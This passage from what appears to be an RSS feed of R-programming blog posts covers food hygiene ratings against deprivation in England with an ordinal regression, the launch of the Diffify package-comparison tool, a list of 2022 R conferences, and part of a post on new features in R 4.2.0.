&lt;td style="text-align: right;"&gt;44631&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="even"&gt;
&lt;td style="text-align: left;"&gt;Other catering premises&lt;/td&gt;
&lt;td style="text-align: right;"&gt;42954&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="odd"&gt;
&lt;td style="text-align: left;"&gt;Pub/bar/nightclub&lt;/td&gt;
&lt;td style="text-align: right;"&gt;41004&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="even"&gt;
&lt;td style="text-align: left;"&gt;Caring Premises&lt;/td&gt;
&lt;td style="text-align: right;"&gt;31736&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="odd"&gt;
&lt;td style="text-align: left;"&gt;School/college/university&lt;/td&gt;
&lt;td style="text-align: right;"&gt;25742&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="even"&gt;
&lt;td style="text-align: left;"&gt;Mobile caterer&lt;/td&gt;
&lt;td style="text-align: right;"&gt;17404&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="odd"&gt;
&lt;td style="text-align: left;"&gt;Hotel/bed &amp;amp; breakfast/guest house&lt;/td&gt;
&lt;td style="text-align: right;"&gt;12440&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="even"&gt;
&lt;td style="text-align: left;"&gt;Retailers - supermarkets/hypermarkets&lt;/td&gt;
&lt;td style="text-align: right;"&gt;11237&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="odd"&gt;
&lt;td style="text-align: left;"&gt;Manufacturers/packers&lt;/td&gt;
&lt;td style="text-align: right;"&gt;4845&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="even"&gt;
&lt;td style="text-align: left;"&gt;Distributors/Transporters&lt;/td&gt;
&lt;td style="text-align: right;"&gt;1194&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="odd"&gt;
&lt;td style="text-align: left;"&gt;Farmers/growers&lt;/td&gt;
&lt;td style="text-align: right;"&gt;478&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="even"&gt;
&lt;td style="text-align: left;"&gt;Importers/Exporters&lt;/td&gt;
&lt;td style="text-align: right;"&gt;178&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="visualising-the-data"&gt;Visualising the Data&lt;/h2&gt;
&lt;p&gt;We’re interested in whether Food Hygiene Ratings are randomly scattered
across the country, so it would be useful to view the data as a map.
However, looking at the numbers of establishments above, it’s very clear
that it is neither useful nor feasible to plot every single
establishment individually - we would just be colouring in a map of
England. We need some way of grouping the data, and while there are
obviously a number of different ways to do this, we chose to use
postcode districts.&lt;/p&gt;
&lt;p&gt;In the UK, most postcodes are of the form LLNN NLL (where L denotes a
Letter, N a number). The first group of letters indicate the postcode
area and are normally fairly intuitive. For example, all postcodes in
the &lt;strong&gt;NE&lt;/strong&gt;wcastle upon Tyne area start with &lt;strong&gt;NE&lt;/strong&gt;. The first group of
numbers indicate the postcode district. For example, the city centre of
Newcastle upon Tyne is NE1.&lt;/p&gt;
&lt;p&gt;By extracting both the postcode area and postcode district from the full
postcode we were able to group establishments by postcode district and
then simply calculate the mean of the &lt;strong&gt;Ratings&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;The associated postcode shapefiles are available on
&lt;a href="https://github.com/missinglink/uk-postcode-polygons/tree/master/geojson" rel="external"&gt;GitHub&lt;/a&gt;.
Importing these into R and merging with the postcode district values,
gives us a nice data set that we could then plot onto a map. Using
{leaflet}, we generated the following choropleth map.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/food-hygiene-ratings-uk-deprivation/index_files/figure-commonmark/visualise-1.png" title="Geographical distribution of Food Hygiene Ratings." alt="Geographical distribution of Food Hygiene Ratings." width="672" /&gt;
&lt;p&gt;It looks like the areas of lower ratings seem to coincide with city
centres/urban areas (look at London, Manchester, Birmingham, Liverpool,
Newcastle - these areas are considerably more “yellowy-red” than other
areas). We can probably come up with many reasons why this might be the
case. One possibility is that city centres may attract different types
of establishments than rural areas which then in turn are linked to
having lower ratings - city centre takeaways probably score lower than
countryside guest houses. Another possibility is deprivation data is
playing some part in the geographical spread of ratings; 12% of people
living in urban areas live in an area that is in the top 10% most
deprived areas, this drops to only 1% of people when we consider rural
areas. This seems worth investigating.&lt;/p&gt;
&lt;h2 id="modelling-with-deprivation-data"&gt;Modelling with Deprivation Data&lt;/h2&gt;
&lt;p&gt;To investigate this potential link, we needed to implement regression
techniques, meaning that we needed to create a data set with
establishments and their corresponding deprivation data. Deprivation
data is collated and made available fairly regularly; we used the data
published in
&lt;a href="https://www.gov.uk/government/statistics/english-indices-of-deprivation-2019" rel="external"&gt;2019&lt;/a&gt;.
England is split up into small areas called LSOAs for purposes such as
the census and deprivation data. There are 32,844 LSOAs in England and
each LSOA is given a deprivation score which is made up from seven
different factors:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Income Deprivation&lt;/li&gt;
&lt;li&gt;Employment Deprivation&lt;/li&gt;
&lt;li&gt;Education, Skills and Training Deprivation&lt;/li&gt;
&lt;li&gt;Health Deprivation and Disability&lt;/li&gt;
&lt;li&gt;Crime&lt;/li&gt;
&lt;li&gt;Barriers to Housing and Services&lt;/li&gt;
&lt;li&gt;Living Environment Deprivation&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In each of the seven criteria, LSOAs are given higher scores for
performing worse. The most deprived LSOA in England is Tendring, Essex
with a score of 92.735 and the least deprived LSOA in England is
Chiltern, Buckinghamshire with a score of 0.541.&lt;/p&gt;
&lt;p&gt;We can combine the deprivation and the food hygiene data via their
postcode. Using ordinal regression, we can model the relationship
between deprivation data and ratings:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;estDepMerged &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;readRDS&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;data/estDepMerged.rds&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;model &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; MASS&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;polr&lt;/span&gt;(formula &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;factor&lt;/span&gt;(rating) &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; `Index of Multiple Deprivation (IMD) Score`,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; estDepMerged)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;model
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Call:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# MASS::polr(formula = factor(rating) ~ `Index of Multiple Deprivation (IMD) Score`, &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# data = estDepMerged)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Coefficients:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# `Index of Multiple Deprivation (IMD) Score` &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# -0.01185 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Intercepts:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 0|1 1|2 2|3 3|4 4|5 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# -6.911 -4.417 -3.671 -2.422 -1.266 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Residual Deviance: 589111.36 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# AIC: 589123.36 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This model allows us to estimate the chance of picking a restaurant with
a top hygiene rating based on the location, i.e. deprivation. For the
wealthiest regions, the chances of picking an establishment with a
rating of 5, is around 0.78. If we include 4’s &amp;amp; 5’s, this probability
is raises to 0.92. For establishments on the other end of the spectrum,
the probability of a rating of 5 is only 0.54. Including 4’s &amp;amp; 5’s
increase this probability of 0.79.&lt;/p&gt;
&lt;h2 id="summary"&gt;Summary&lt;/h2&gt;
&lt;p&gt;Despite the overwhelming number of high food hygiene ratings (which,
again, I am not complaining about as far as dinner is concerned), we
were still able to see some interesting (read, concerning) patterns in
the hygiene rating locations. There is a clear link between deprivation
scores and food hygiene ratings, which we can see in the above
percentages alongside the colour coded map - you are much more likely to
encounter an establishment with a rating of five in the least deprived
areas than in the most deprived.&lt;/p&gt;
&lt;p&gt;We acknowledged earlier that there is also a difference in the type of
establishment in the different locations, but perhaps this is just more
of the same story? Yes there are different types of establishments in
different locations, but why is that? It isn’t a huge leap to suggest
that this is also related to the deprivation level of the location. In
fact, when we investigated further, we found that deprived areas not
only had a large number of takeaways, but these takeaways tended to
score lower (on average) in terms of food hygiene.&lt;/p&gt;
&lt;h2 id="futher-information"&gt;Futher information&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;All code is available at our &lt;a href="https://github.com/jumpingrivers/blog/" rel="external"&gt;GitHub
Repo&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;This work was initially carried out by &lt;a href="http://maths.dept.shef.ac.uk/maths/staff_info_987.html" rel="external"&gt;James
Salsbury&lt;/a&gt; as
part of his MMathStat project at Newcastle University. James is now
a PhD student at the University of Sheffield looking at Bayesian
experimental design for adaptive clinical trials.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/food-hygiene-ratings-uk-deprivation/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Diffify</title><link>https://www.jumpingrivers.com/blog/diffify-launch/</link><pubDate>Fri, 29 Apr 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/diffify-launch/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/diffify-launch/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/diffify-launch/diffify_logo.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;You know that sinking feeling that you get when you&amp;rsquo;re months into a big project and you log in one day and nothing works? Turns out something has updated and things have been removed that you needed and now you need to spend hours-days figuring out what&amp;rsquo;s changed and your masters deadline is getting closer and &amp;hellip; ok, apparently this took me back to a very specific event.&lt;/p&gt;
&lt;p&gt;But I&amp;rsquo;m sure &lt;em&gt;most&lt;/em&gt; of that sounds familiar to you if you&amp;rsquo;ve ever programmed something over a longer period of time.&lt;/p&gt;
&lt;p&gt;Over the last few months, &lt;a href="https://www.jumpingrivers.com" rel="external"&gt;Jumping Rivers&lt;/a&gt; have been working on a tool that will make it easier to see differences between R package versions: &lt;a href="https://diffify.com" rel="external"&gt;Diffify&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;With &lt;a href="https://diffify.com" rel="external"&gt;Diffify&lt;/a&gt;, you can compare versions of R packages at the click of a button. This post will give a quick overview of the tool&amp;rsquo;s features and how to use them.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-diffify-launch"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="what-is-diffify"&gt;What is Diffify?&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://diffify.com" rel="external"&gt;Diffify&lt;/a&gt; provides you with a comparison between different versions of any R package stored on CRAN. Say you were using a particular version of a package in a project and now a new version of that package is available. With Diffify you are easily able to check what has been changed in the new release. This allows you to determine how updating the package will affect your current code. In particular, Diffify gives you information from the News file, as well as changes in the dependencies, namespace and functions of the package.&lt;/p&gt;
&lt;h2 id="how-can-i-compare-versions"&gt;How can I compare versions?&lt;/h2&gt;
&lt;p&gt;Simply type in the name of the package you wish to to look at. By default, the most recent two versions of this package will be compared. However, if you wish to compare different versions you can select these from later/earlier version drop-down menus. For this blog post we have selected to &lt;a href="https://diffify.com/R/dplyr/1.0.5/1.0.8" rel="external"&gt;compare the changes&lt;/a&gt; from Version 1.0.5 to Version 1.0.8 of the dplyr package.&lt;/p&gt;
&lt;img src="res_dplyr_homepage.png" title="Comparing Version 1.0.5 to Version 1.0.8 of dplyr." alt="Comparing Version 1.0.5 to Version 1.0.8 of dplyr." width="1400" style="width:700px" class="image-center" /&gt;
&lt;h3 id="news"&gt;News&lt;/h3&gt;
&lt;p&gt;This gives you the information in the News file for each version release between &amp;ldquo;Earlier version&amp;rdquo; and &amp;ldquo;Later version&amp;rdquo;&lt;/p&gt;
&lt;img src="dplyr_news.png" title="Comparing Version 1.0.5 to Version 1.0.8 of the dplyr NEWS file." alt="Comparing Version 1.0.5 to Version 1.0.8 of the dplyr NEWS file." width="1261" style="width:700px" class="image-center" /&gt;
&lt;h3 id="dependencies"&gt;Dependencies&lt;/h3&gt;
&lt;p&gt;Here you can compare the dependencies between the two versions. You can see which imports, suggests, depends and enhances have been added or removed. You can also see if the version requirement for a dependency has changed.&lt;/p&gt;
&lt;img src="dplyr_depends.png" title="Comparing Version 1.0.5 to Version 1.0.8 of dplyr Depends." alt="Comparing Version 1.0.5 to Version 1.0.8 of dplyr Depends." width="1312" style="width:700px" class="image-center" /&gt;
&lt;h3 id="namespace"&gt;Namespace&lt;/h3&gt;
&lt;p&gt;Here you can see all exported objects which have been added or removed. You can also toggle between different types of exported objects.&lt;/p&gt;
&lt;img src="dplyr_namespace.png" title="Comparing Version 1.0.5 to Version 1.0.8 of the dplyr NAMESPACE file." alt="Comparing Version 1.0.5 to Version 1.0.8 of the dplyr NAMESPACE file." width="1309" style="width:700px" class="image-center" /&gt;
&lt;h3 id="functions"&gt;Functions&lt;/h3&gt;
&lt;p&gt;Here you can find out more detail on the functions of the package. You can see the functions which have been removed, added or changed.&lt;/p&gt;
&lt;img src="dplyr_functions.png" title="Comparing Version 1.0.5 to Version 1.0.8 of the dplyr functions." alt="Comparing Version 1.0.5 to Version 1.0.8 of the dplyr functions." width="1309" style="width:700px" class="image-center" /&gt;
&lt;p&gt;Where a function has been changed, the function arguments for both versions are displayed. Arguments that have been added, removed, or for which the default value has changed, are highlighted. In the example below we can see the arguments &lt;code&gt;caller_env&lt;/code&gt; and &lt;code&gt;error_call&lt;/code&gt; have been added to the &lt;code&gt;distict_prepare()&lt;/code&gt; function between Version 1.0.5 and Version 1.0.8 of {dplyr}.&lt;/p&gt;
&lt;img src="dplyr_changed_args.png" title="Comparing Version 1.0.5 to Version 1.0.8 of the dplyr function arguments." alt="Comparing Version 1.0.5 to Version 1.0.8 of the dplyr function arguments." width="1018" style="width:700px" class="image-center" /&gt;
&lt;p&gt;Want to check it out for yourself? Head over to &lt;a href="https://diffify.com" rel="external"&gt;diffify.com&lt;/a&gt; to start comparing. Or save this link to bookmarks for when you need to check a version diff.&lt;/p&gt;
&lt;p&gt;If you spot any bugs on the site please raise an issue at &lt;a href="https://github.com/jumpingrivers/diffify/issues" rel="external"&gt;github.com/jumpingrivers/diffify&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/diffify-launch/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Upcoming R conferences (2022)</title><link>https://www.jumpingrivers.com/blog/upcoming-r-conferences/</link><pubDate>Fri, 08 Apr 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/upcoming-r-conferences/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/upcoming-r-conferences/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/upcoming-r-conferences/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;The daffodils are out, the sun is shining(ish), spring is in the air! And that means that it’s time to start planning for the conference season.&lt;/p&gt;
&lt;p&gt;This year we’ll be treated to a lot more in person conferences for the first time since 2020, but for those of you who either prefer the online formats, or are still a bit hesitant about attending large conferences, fear not! There are many online and hybrid conferences for you to enjoy, and we’ve included a few highlights below.&lt;/p&gt;
&lt;p&gt;We also maintain a list of &lt;a href="https://jumpingrivers.github.io/meetingsR/" rel="external"&gt;upcoming Rstats conferences&lt;/a&gt;, so take a look and see if there’s anything that catches your eye.&lt;/p&gt;
&lt;hr&gt;
&lt;h3 id="whyr-turkey-online"&gt;WhyR? Turkey (online)&lt;/h3&gt;
&lt;p&gt;WhyR? Turkey is a conference which aims to bring together Turkish data scientists and R users from around the world to share their knowledge and expertise through talks, panels and workshops.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;15-17 April: &lt;a href="https://whyr.pl/2022/turkey/en/" rel="external"&gt;Why R? Turkey 2022&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="user-online"&gt;useR! (online)&lt;/h3&gt;
&lt;p&gt;useR! is aimed at anyone and everyone who uses R in any capacity, from data scientists to students. Including talks, panels, poster sessions and tutorials, this conference has something for everyone, whatever level of R&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;20th - 23th June: &lt;a href="https://user2022.r-project.org/" rel="external"&gt;useR! 2022&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h2 id="come-and-say-hi"&gt;Come and say hi!&lt;/h2&gt;
&lt;p&gt;Of course, we’re not going to be missing out on all of the fun! This year we’ll be attending several conferences, so keep an eye out to come and say hi, or to get your hands on one of the legendary Jumping Rivers coasters.&lt;/p&gt;
&lt;h3 id="big-data-belfast"&gt;Big Data Belfast&lt;/h3&gt;
&lt;p&gt;This one day conference hosted in the heart of &lt;strong&gt;Belfast&lt;/strong&gt; is an opportunity for data scientists and business leaders from a wide array of industries to come together, network, exchange ideas and learn how data science can benefit them in their day-to-day work.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;25th May: &lt;a href="https://www.bigdatabelfast.com/" rel="external"&gt;Big Data Belfast&lt;/a&gt; - Belfast, UK&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="rstudioconf"&gt;rstudio::conf&lt;/h3&gt;
&lt;p&gt;rstudio::conf is back in person this year, this time in &lt;strong&gt;Washington DC&lt;/strong&gt;. This conference is a great opportunity for anyone who uses RStudio to meet up, attend workshops and talks from RStudio experts to learn new and exciting things and generally discuss all things RStudio. We’ll be attending this one, so if you see us around feel free to say hello.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;25th-28th July: &lt;a href="https://www.rstudio.com/conference/" rel="external"&gt;rstudio::conf&lt;/a&gt; - Washington DC, USA&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="earl"&gt;EARL&lt;/h3&gt;
&lt;p&gt;The EARL conference is also now back in person in &lt;strong&gt;London&lt;/strong&gt;. This conference caters to everyone who uses R for real world applications. If you use R as part of your work, EARL is for you. Keep an eye out for Jumping Rivers’ presence at this one, as we’ll be exhibiting.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;6th-8th September: &lt;a href="https://info.mango-solutions.com/earl-conference-2022" rel="external"&gt;EARL Conference 2022&lt;/a&gt; - London, UK&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="rss-international"&gt;RSS International&lt;/h3&gt;
&lt;p&gt;The Royal Statistical Society international conference is taking place in person in &lt;strong&gt;Aberdeen&lt;/strong&gt; this year. This one is aimed at anyone interested in statistics or data science, and is a place for people from all over the world to come together and share their knowledge and experience. We’ll be exhibiting at this one, so come say hello.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;12th-15th September: &lt;a href="https://rss.org.uk/conference2022/" rel="external"&gt;RSS International Conference 2022&lt;/a&gt; - Aberdeen, UK&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/upcoming-r-conferences/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>New features in R 4.2.0</title><link>https://www.jumpingrivers.com/blog/new-features-r420/</link><pubDate>Fri, 01 Apr 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/new-features-r420/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/new-features-r420/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/new-features-r420/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h1 id="r-420-is-due-to-be-released"&gt;R-4.2.0 is due to be released!&lt;/h1&gt;
&lt;p&gt;Another year has passed, which means an updated version of R is due to
be released - R version 4.2.0. As usual there have been many &lt;a href="https://stat.ethz.ch/R-manual/R-devel/doc/html/NEWS.html" rel="external"&gt;changes
and
improvements&lt;/a&gt;
over the last year. This blog post only picks out a tiny handful, but
there are dozens of smaller changes and bug fixes that can be found in
the
&lt;a href="https://stat.ethz.ch/R-manual/R-devel/doc/html/NEWS.html" rel="external"&gt;changelog&lt;/a&gt;.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-new-features-r420"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="pipe-updates"&gt;Pipe updates&lt;/h2&gt;
&lt;p&gt;The native pipe &lt;code&gt;|&amp;gt;&lt;/code&gt; was introduced in
&lt;a href="https://www.jumpingrivers.com/blog/new-features-r410-pipe-anonymous-functions/" rel="external"&gt;R 4.1.0&lt;/a&gt;.
This release has introduced the &lt;code&gt;_&lt;/code&gt; that can be used as a placeholder in
a named argument. For example,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# This works in R 4.2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mtcars &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;lm&lt;/span&gt;(mpg &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; disp, data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; _)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Side note: some of the older R users amongst us, still remember when &lt;code&gt;_&lt;/code&gt;
was used as an assignment operator!&lt;/p&gt;
&lt;h2 id="improved-help-page"&gt;Improved help page&lt;/h2&gt;
&lt;p&gt;The HTML help system has a few new features:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;LaTeX-like mathematics can be typeset using either
&lt;a href="https://katex.org/" rel="external"&gt;KaTeX&lt;/a&gt; or &lt;a href="https://www.mathjax.org/" rel="external"&gt;MathJax&lt;/a&gt;,
usage and example code is highlighted using
&lt;a href="https://prismjs.com/" rel="external"&gt;Prism&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Dynamic help for examples and code demos using {knitr}.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The HTML help system now uses HTML5 (via
&lt;a href="https://bugs.r-project.org/show_bug.cgi?id=18149" rel="external"&gt;PR#18149&lt;/a&gt;). What
this means to everyday R users is that the help package looks a lot
nicer&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/new-features-r420/lm-help.png" title="The lm help page with R 4.2.0" alt="The lm help page with R 4.2.0" style="width:500px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;p&gt;The examples can now be easily run using the &lt;code&gt;Run Examples&lt;/code&gt; button&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/new-features-r420/run-examples.png" title="The Run example page using 4.2.0" alt="The Run example page using 4.2.0" style="width:500px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;h2 id="if-and-while-statements"&gt;if and while statements&lt;/h2&gt;
&lt;p&gt;Calling &lt;code&gt;while()&lt;/code&gt; or &lt;code&gt;if()&lt;/code&gt; statements with a condition of length
greater than one gives an error rather than a warning.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;) &lt;span style="color:#d2a8ff;font-weight:bold"&gt;do_something&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Error in if (1:2 == 1) do_something() : the condition has length &amp;gt; 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This is clearly a &lt;em&gt;good&lt;/em&gt; thing, as when the length of the condition is
greater than one, this is almost certainly an error. If you are using
older versions of R, you can set &lt;code&gt;_R_CHECK_LENGTH_1_CONDITION_&lt;/code&gt; to
&lt;code&gt;true&lt;/code&gt; in your &lt;code&gt;.Renviron&lt;/code&gt; to get the same effect.&lt;/p&gt;
&lt;h2 id="changes-to-windows"&gt;Changes to Windows&lt;/h2&gt;
&lt;p&gt;There are quite few changes to Windows, in particular&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Support for 32-bit builds has been dropped.&lt;/li&gt;
&lt;li&gt;UTF-8 locales are used where available.&lt;/li&gt;
&lt;li&gt;The default personal library on Windows, folder &lt;code&gt;R\win-library\x.y&lt;/code&gt;
where &lt;code&gt;x.y&lt;/code&gt; stands for R release &lt;code&gt;x.y.z&lt;/code&gt;, is now a subdirectory of
local application data directory (usually a hidden directory
&lt;code&gt;C:\Users\username\AppData\Local&lt;/code&gt;).&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="data-frames-gain-a-new-method"&gt;Data frames gain a new method&lt;/h2&gt;
&lt;p&gt;The &lt;code&gt;as.vector()&lt;/code&gt; function gains an S3 data frame method which returns a
simple list.&lt;/p&gt;
